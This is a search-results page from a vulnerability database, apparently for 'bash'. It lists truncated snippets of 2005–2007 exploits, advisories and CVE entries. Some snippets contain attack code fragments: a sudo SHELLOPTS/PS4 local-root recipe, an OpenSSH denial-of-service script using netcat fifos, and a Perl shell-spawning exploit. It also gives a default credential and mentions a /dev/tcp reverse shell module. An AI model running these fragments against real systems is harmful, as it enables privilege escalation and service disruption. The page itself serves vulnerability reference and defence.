Lucene search
+L

2673 matches found

exploitpack
exploitpack
added 2007/07/05 12:0 a.m.21 views

AsteriDex 3.0 - callboth.php Remote Code Execution

AsteriDex 3.0 - callboth.php Remote Code Execution Begin exploit !/bin/bash echo Asteridex PoC Exploit callboth.php vulnerability echo By Carl Livitt / Hoku Security / June 2007 echo This has to be a a valid SIP address, and b must answer when dialled. The exploit will fail without these conditio...

Exploits0
Packet Storm
Packet Storm
added 2006/10/09 12:0 a.m.19 views

openssh43p1DoS.txt

!/bin/bash OpenSSH CRC compensation attack detection DoS PoC. Tavis Ormandy Yes, I really did implement crc-32 in bash. usage: script victim hostname hostname=$1:-localhost port=$2:-22 where the fifo is created to communicate with netcat fifo=/tmp/nc.$$ make the fifos mkfifo $fifo.in mkfifo...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2006/09/27 12:0 a.m.1316 views

OpenSSH 4.3 p1 - Duplicated Block Remote Denial of Service

!/bin/bash OpenSSH CRC compensation attack detection DoS PoC. Tavis Ormandy Yes, I really did implement crc-32 in bash. usage: script victim hostname hostname=$1:-localhost port=$2:-22 where the fifo is created to communicate with netcat fifo=/tmp/nc.$$ make the fifos mkfifo $fifo.in mkfifo...

7.4AI score
Exploits0
seebug.org
seebug.org
added 2006/09/27 12:0 a.m.18 views

OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit

No description provided by source. !/bin/bash OpenSSH CRC compensation attack detection DoS PoC. Tavis Ormandy [email protected] Yes, I really did implement crc-32 in bash. usage: script hostname victim hostname hostname=$1:-localhost port=$2:-22 where the fifo is created to communicate with netc...

7.1AI score
Exploits0
exploitpack
exploitpack
added 2006/07/18 12:0 a.m.53 views

Linux Kernel 2.6.13 2.6.17.4 - logrotate prctl() Local Privilege Escalation

Linux Kernel 2.6.13 2.6.17.4 - logrotate prctl Local Privilege Escalation / $Id: raptorprctl2.c,v 1.3 2006/07/18 13:16:45 raptor Exp $ raptorprctl2.c - Linux 2.6.x suiddumpable2 logrotate Copyright c 2006 Marco Ivaldi The suiddumpable support in Linux kernel 2.6.13 up to versions before 2.6.17.4,...

4.6CVSS0.8AI score0.04387EPSS
Exploits17
securityvulns
securityvulns
added 2006/05/30 12:0 a.m.93 views

Open Exchange default account

mailadmin/secret LDAP account is created during installation with /bin/bash login shell...

2.2AI score
Exploits0References1Affected Software1
securityvulns
securityvulns
added 2006/05/30 12:0 a.m.33 views

Wavecon Advisory: Open-Xchange <= 0.8.2 defaultuser with /bin/bash and default password

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Advisory Name Open-Xchange defaultuser with /bin/bash Vendor Open-Xchange Inc. Product Open-Xchange Version 0.8.2 Author Cemil Degirmenci Risk high o Description: ======================= The OPEN-XCHANGE Collaboration and Integration Server Environmen...

7.1AI score
Exploits0
Tenable Nessus
Tenable Nessus
added 2006/05/13 12:0 a.m.51 views

FreeBSD : sudo -- arbitrary command execution (1b725079-9ef6-11da-b410-000e0c2e438a)

Tavis Ormandy reports : The bash shell uses the value of the PS4 environment variable after expansion as a prefix for commands run in execution trace mode. Execution trace mode xtrace is normally set via bash's -x command line option or interactively by running 'set -o xtrace'. However, it may al...

4.6CVSS5.8AI score0.00624EPSS
Exploits2References3
Cent OS
Cent OS
added 2006/03/21 11:11 p.m.45 views

bash security update

CentOS Errata and Security Advisory CESA-2005:206-8 Merged security bulletin from advisories: https://lists.centos.org/pipermail/centos-announce/2006-March/074928.html Affected packages: bash bash-doc...

7.1AI score
Exploits0References8
NVD
NVD
added 2006/02/22 11:2 p.m.27 views

CVE-2006-0848

The "Open 'safe' files after downloading" option in Safari on Apple Mac OS X allows remote user-assisted attackers to execute arbitrary commands by tricking a user into downloading a MACOSX folder that contains metadata resource fork that invokes the Terminal, which automatically interprets the...

5.1CVSS6.9AI score0.58105EPSS
Exploits8References13
Tenable Nessus
Tenable Nessus
added 2006/01/15 12:0 a.m.17 views

Ubuntu 4.10 : sudo vulnerability (USN-28-1)

Liam Helmer discovered an input validation flaw in sudo. When the standard shell 'bash' starts up, it searches the environment for variables with a value beginning with ''. For each of these variables a function with the same name is created, with the function body filled in from the environment...

5.7AI score
Exploits0
Metasploit
Metasploit
added 2006/01/14 8:12 p.m.536 views

Unix Command Shell, Reverse TCP (/dev/tcp)

Creates an interactive shell via bash's builtin /dev/tcp. This will not work on circa 2009 and older Debian-based Linux distributions including Ubuntu because they compile bash without the /dev/tcp feature. This module requires Metasploit: https://metasploit.com/download Current source:...

7.3AI score
Exploits0
securityvulns
securityvulns
added 2006/01/09 12:0 a.m.46 views

sudo privilege escalation

few envoronment vaqriables used by bash perl and python are not cleaned...

3AI score
Exploits0References4Affected Software1
0day.today
0day.today
added 2005/11/09 12:0 a.m.39 views

Sudo <= 1.6.8p9 (SHELLOPTS/PS4 ENV variables) Local Root Exploit

Exploit for linux platform in category local exploits ================================================================ Sudo int main setuid0; system"/bin/sh"; % % gcc -o egg egg.c % setenv SHELLOPTS xtrace % setenv PS4 '$chown root:root egg' % sudo ./x.sh echo Getting root!! Getting root!! % ls...

6.8AI score
Exploits0
exploitpack
exploitpack
added 2005/11/09 12:0 a.m.14 views

Sudo 1.6.8p9 - SHELLOPTSPS4 Environment Variables Privilege Escalation

Sudo 1.6.8p9 - SHELLOPTSPS4 Environment Variables Privilege Escalation Sudo local root escalation privilege vuln versions : sudo int main setuid0; system"/bin/sh"; % % gcc -o egg egg.c % setenv SHELLOPTS xtrace % setenv PS4 '$chown root:root egg' % sudo ./x.sh echo Getting root!! Getting root!! %...

1.4AI score
Exploits0
UbuntuCve
UbuntuCve
added 2005/10/25 4:2 p.m.24 views

CVE-2005-2959

Incomplete blacklist vulnerability in sudo 1.6.8 and earlier allows local users to gain privileges via the 1 SHELLOPTS and 2 PS4 environment variables before executing a bash script on behalf of another user, which are not cleared even though other variables are...

4.6CVSS5.9AI score0.00624EPSS
Exploits2References2
CVE
CVE
added 2005/10/25 4:0 a.m.78 views

CVE-2005-2959

CVE-2005-2959 concerns sudo 1.6.8 and earlier, where the SHELLOPTS and PS4 environment variables are not cleared during privilege-escalation prompts. The result is a local privilege escalation when a user with limited sudo privileges runs a bash script, as these variables can be passed through to...

4.6CVSS7.9AI score0.00624EPSS
Exploits2References19Affected Software1
FreeBSD
FreeBSD
added 2005/10/25 12:0 a.m.28 views

sudo -- arbitrary command execution

Tavis Ormandy reports: The bash shell uses the value of the PS4 environment variable after expansion as a prefix for commands run in execution trace mode. Execution trace mode xtrace is normally set via bash's -x command line option or interactively by running "set -o xtrace". However, it may als...

4.6CVSS7AI score0.00624EPSS
Exploits2References1
UbuntuCve
UbuntuCve
added 2005/09/20 10:3 p.m.27 views

CVE-2005-2968

Firefox 1.0.6 and Mozilla 1.7.10 allows attackers to execute arbitrary commands via shell metacharacters in a URL that is provided to the browser on the command line, which is sent unfiltered to bash...

7.5CVSS6AI score0.10718EPSS
Exploits0References3
Packet Storm
Packet Storm
added 2005/05/27 12:0 a.m.27 views

IMail.pl

GFHost explo Spawn bash style Shell with webserver uid Greetz SPAX, foxtwo, Zone-H This Script is currently under development use strict; use IO::Socket; my $host; my $port; my $command; my $url; my @results; my $probe; my @U; $U1 = "/dl.php?a=0.1&OURFILE=ff24404eeac528b"...

7.4AI score
Exploits0
Rows per page
Query Builder